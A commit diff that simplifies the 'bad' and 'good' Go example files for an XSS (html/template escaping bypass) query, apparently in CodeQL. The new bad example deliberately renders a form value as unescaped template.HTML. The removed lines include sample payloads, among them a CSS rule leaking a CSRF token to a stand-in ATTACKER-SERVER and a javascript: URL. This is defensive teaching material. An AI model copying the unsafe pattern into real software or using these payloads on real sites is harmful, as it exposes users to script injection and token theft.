Make examples in qhelp shorter and more realistic

owen-mc · owen-mc · commit 00cc430ac3a4 · 2025-05-01T16:06:29.000+01:00
diff --git a/go/ql/src/Security/CWE-079/HtmlTemplateEscapingBypassXssBad.go b/go/ql/src/Security/CWE-079/HtmlTemplateEscapingBypassXssBad.go
@@ -2,69 +2,12 @@ package main
 
 import (
 	"html/template"
-	"os"
+	"net/http"
 )
 
-func main() {}
-func source(s string) string {
-	return s
-}
-
-type HTMLAlias = template.HTML
-
-func checkError(err error) {
-	if err != nil {
-		panic(err)
-	}
-}
-
-// bad is an example of a bad implementation
-func bad() {
-	tmpl, _ := template.New("test").Parse(`Hi {{.}}\n`)
-	tmplTag, _ := template.New("test").Parse(`Hi <b {{.}}></b>\n`)
-	tmplScript, _ := template.New("test").Parse(`<script> eval({{.}}) </script>`)
-	tmplSrcset, _ := template.New("test").Parse(`<img srcset="{{.}}"/>`)
-
-	{
-		{
-			var a = template.HTML(source(`<a href='example.com'>link</a>`))
-			checkError(tmpl.Execute(os.Stdout, a))
-		}
-		{
-			{
-				var a template.HTML
-				a = template.HTML(source(`<a href='example.com'>link</a>`))
-				checkError(tmpl.Execute(os.Stdout, a))
-			}
-			{
-				var a HTMLAlias
-				a = HTMLAlias(source(`<a href='example.com'>link</a>`))
-				checkError(tmpl.Execute(os.Stdout, a))
-			}
-		}
-	}
-	{
-		var c = template.HTMLAttr(source(`href="https://example.com"`))
-		checkError(tmplTag.Execute(os.Stdout, c))
-	}
-	{
-		var d = template.JS(source("alert({hello: 'world'})"))
-		checkError(tmplScript.Execute(os.Stdout, d))
-	}
-	{
-		var e = template.JSStr(source("setTimeout('alert()')"))
-		checkError(tmplScript.Execute(os.Stdout, e))
-	}
-	{
-		var b = template.CSS(source("input[name='csrftoken'][value^='b'] { background: url(//ATTACKER-SERVER/leak/b); } "))
-		checkError(tmpl.Execute(os.Stdout, b))
-	}
-	{
-		var f = template.Srcset(source(`evil.jpg 320w`))
-		checkError(tmplSrcset.Execute(os.Stdout, f))
-	}
-	{
-		var g = template.URL(source("javascript:alert(1)"))
-		checkError(tmpl.Execute(os.Stdout, g))
-	}
+func bad(w http.ResponseWriter, r *http.Request) {
+	r.ParseForm()
+	username := r.Form.Get("username")
+	tmpl, _ := template.New("test").Parse(`<b>Hi {{.}}</b>`)
+	tmpl.Execute(w, template.HTML(username))
 }
diff --git a/go/ql/src/Security/CWE-079/HtmlTemplateEscapingBypassXssGood.go b/go/ql/src/Security/CWE-079/HtmlTemplateEscapingBypassXssGood.go
@@ -2,14 +2,12 @@ package main
 
 import (
 	"html/template"
-	"os"
+	"net/http"
 )
 
-// good is an example of a good implementation
-func good() {
-	tmpl, _ := template.New("test").Parse(`Hello, {{.}}\n`)
-	{ // This will be escaped:
-		var escaped = source(`<a href="example.com">link</a>`)
-		checkError(tmpl.Execute(os.Stdout, escaped))
-	}
+func good(w http.ResponseWriter, r *http.Request) {
+	r.ParseForm()
+	username := r.Form.Get("username")
+	tmpl, _ := template.New("test").Parse(`<b>Hi {{.}}</b>`)
+	tmpl.Execute(w, username)
 }
